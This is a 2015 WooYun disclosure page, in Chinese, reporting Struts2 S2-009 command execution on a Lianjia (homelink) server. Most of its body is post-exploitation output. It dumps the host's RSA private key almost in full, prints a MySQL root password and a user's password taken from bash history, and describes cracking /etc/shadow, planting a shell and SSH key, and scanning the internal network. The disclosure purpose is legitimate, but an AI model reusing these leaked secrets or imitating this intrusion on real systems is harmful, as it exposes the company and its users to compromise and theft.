当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134544

漏洞标题:链家某站struct2命令执行

相关厂商:homelink.com.cn

漏洞作者: xk0n

提交时间:2015-08-17 11:21

修复时间:2015-10-02 11:08

公开时间:2015-10-02 11:08

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开

简要描述:

链家某站struct2命令执行,可获取重要信息

详细说明:

存在的站为http://42.159.27.54/view_initIndexPageForCustomer.action

Target: http://42.159.27.54/view_initIndexPageForCustomer.action
Useage: S2-009 
Whoami: root
WebPath: /usr/local/tomcat7/webapps/homelink/


可以上传shell但是没有执行权限,而且chmod也没用,无奈。。转而上传ssh公钥,但是还是不能登陆,估计是要更改/etc/ssh/sshd_config,后来发现在/etc/ssh/下有公私玥的,但是我无意中把22端口干掉了。。。(><)

★K8cmd-> ls -l /etc/ssh/
====================================================================================================================================
total 160
-rw-------. 1 root root 125811 Nov 13  2014 moduli
-rw-r--r--. 1 root root   2047 Nov 13  2014 ssh_config
-rw-------  1 root root   3886 Aug  6 17:21 sshd_config
-rw-------. 1 root root   3880 Jul  2 17:15 sshd_config.20150702
-rw-------. 1 root root    668 Feb  9  2015 ssh_host_dsa_key
-rw-r--r--. 1 root root    590 Feb  9  2015 ssh_host_dsa_key.pub
-rw-------. 1 root root    963 Feb  9  2015 ssh_host_key
-rw-r--r--. 1 root root    627 Feb  9  2015 ssh_host_key.pub
-rw-------. 1 root root   1675 Feb  9  2015 ssh_host_rsa_key
-rw-r--r--. 1 root root    408 Feb  9  2015 ssh_host_rsa_key.pub
====================================================================================================================================
★K8cmd-> cat /etc/ssh/ssh_host_rsa_key
====================================================================================================================================
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAwnjauhVy/wnS7lMbk8KAnSkQxm1x+7LrdfSUFGvcn6b6jwfp
0OX89lQFGZ9GjJiU7gQ/Y6gcEKyYzx5n7xburk63b/er8D8Re7Y9p9HV+MYGAC0G
v8gY0zbcyDLFRlsJLWxgIhRvtY716cyrtO5oGDv4YpKhRPNKTUntrzcY899HhVe8
QY2sBIbhyq4iygzk57C73gMj+/WZ2Xxz9soxfZE2a7wIBkSZ40KRxNTfnLGi4ysi
xXHYm7tSxUlhWPVvlLNWZX7EPOxLePvSyeyu0fGk5Egva/qTE+Ikvqt3njiRdN6M
Ucyr+7ymWDtJnfb6hL06B+rwvSEZSBVixhoJ5wIBIwKCAQEAlgV1iDxup3ybZ2Su
37NNRgm8e9DFpOkcCol5jBixgnl/dacE1Fml4piWOFZMXdTKqPv2YtIkR2CTI286
PBkBRKMfy2dKH7ufxdW6iMZx3SsL8YHSAaj9NTjzdd4F5dEy9ye338afUYuKgSjc
Ox5QTTWTucGSWcL+zeiSyP6eOHeywx7SbgGh1g+15Tn0C2lVzb91yXOgmRXJGJ1l
O7LcSwRCuqOJmrMePyuk3/hgGXD+zPsvkQzggiaySO0nLDCGzYcJAtR80zBlO3nd
MaObHuA9oduvfaD/0HGdu0k7O69/23jaAYrfgwkbBicxeM0rXd4p4dCVenYWTEHr
/iYrcwKBgQDoOWrFiAPP8E2E2aMhal3SKOEaQd4aAYkhWvHa4qEuguh9BSUd+RKj
rHFoGDB8MfVDTw7LA9B+aoEre1CiN5G3LisRBE2ygyvCnvpc+czFLrLQKW7ddb7O
QpNqhCI7xWCDoiPsj+lWej1QQOZtP7ucJk6ZhzAe51u7XnqvgegXJQKBgQDWYfRq
r62ref8SVh6yDoVXqp6Nqfdyrz1EaB1hs89grGDUrYoIRKiWHdF536TKZjNhIhka
GJCo8M8aQMVTdlQ5EEGFjO43Bs2mz0cLOnHBvZdoZErDzqP0d0AwIdT4i3lLo0Pj
+McEXGCR3/KluCftQ5EB6jqnxT9BAgLgKiZlGwKBgDu2/jLLNC4n2WtN6B6JEM+k
HKBaFIpYKpOMahO2nnmsoi7Gzwe1E2vqg4/LtLI4u2kUVELVGFsFcawYZTEG+ZWA
5oC39rjf5q5jZPNWLVdGhcB/rss7iNXz3MOeUfIcz6zR6/sAbzN+hMt+ZyNoKO2j
c0wM0dwPmz7PJtysYEB3AoGBAMQByYYc9o4mZY0bicddu73d0sqqBs9BIhKoVWCk
ZdS63DAposW7HcsT8riR9cBdcM3WCFJfmjQPXkPjcpVzgDQsHqX9MZFlTk9ebNcQ
3Qjn2uMZ3fTaL4BtB3x2tBZw4+1iEi+EXi/fbjw6d3Lxg5cZNB8CCb32KzQfGJJv
rhNLAoGAMLpsrZuRHxJQr9r9YdLnRIFCbtcEmdzn+w95bB8PNJSB2uTtHSlsWi9D
CXkDzhMIjknZnQORJD/tjnH8SYnVr304DqHqHhfGxtpE1bUhXVy/cB8Rk/SSfxTz
zXhTLutBaR3JtQ5HjGIX5heKdLX/T5EtFr************************
-----END RSA PRIVATE KEY-----
====================================================================================================================================


但是可以拿到/etc/passwd 和/etc/shadow,本地破解登陆密码,但是字典不给力。。。
但是还是能够读到各种信息,而且nmap可以用扫内网
/root/.bash_history中可以看到数据库密码:

/usr/local/mysql/bin/mysqladmin -uroot password 'homelink'


还有kevin的

***************
#1435828548
echo "e0GNnsFG234gFpgI945gfBfergGe453BCvbr8" |passwd --stdin kevin
*************


★K8cmd-> cat /tmp/test
====================================================================================================================================
# Nmap 5.51 scan initiated Sun Aug 16 19:51:51 2015 as: nmap -sP -oN /tmp/test 10.20.7.1/16
Nmap scan report for 10.20.0.4
Host is up (0.13s latency).
Nmap scan report for 10.20.0.5
Host is up (0.012s latency).
Nmap scan report for 10.20.5.5
Host is up (0.00090s latency).
Nmap scan report for 10.20.5.6
Host is up (0.00072s latency).
Nmap scan report for 10.20.5.7
Host is up (0.0011s latency).
Nmap scan report for 10.20.5.9
Host is up (0.00099s latency).
Nmap scan report for 10.20.5.10
Host is up (0.00063s latency).
Nmap scan report for 10.20.5.11
Host is up (0.00076s latency).
Nmap scan report for 10.20.5.12
Host is up (0.00076s latency).
Nmap scan report for 10.20.5.14
Host is up (0.00086s latency).
Nmap scan report for 10.20.6.1
Host is up (0.012s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for 10.20.6.4
Host is up (0.053s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for 10.20.6.5
Host is up (0.013s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for hl-az-hrrecrup (10.20.6.7)
Host is up.
Nmap scan report for 10.20.6.8
Host is up (0.11s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for 10.20.6.9
Host is up (0.13s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
Nmap scan report for 10.20.6.10
Host is up (0.13s latency).
MAC Address: 12:34:56:78:9A:BC (Unknown)
=======================================================================================================================


能力有多大就走的有多深,小菜暂时到这里了
最后我把我测试写的一些文件都删了,除了/usr/local/tomcat7/webapps/下有两个jsp和一个test,我好像删不了。。。

漏洞证明:

见详情

修复方案:

升级吧

版权声明:转载请注明来源 xk0n@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-18 11:07

厂商回复:

多谢 路人甲 提交的漏洞,我们会尽快积极处理。

最新状态:

暂无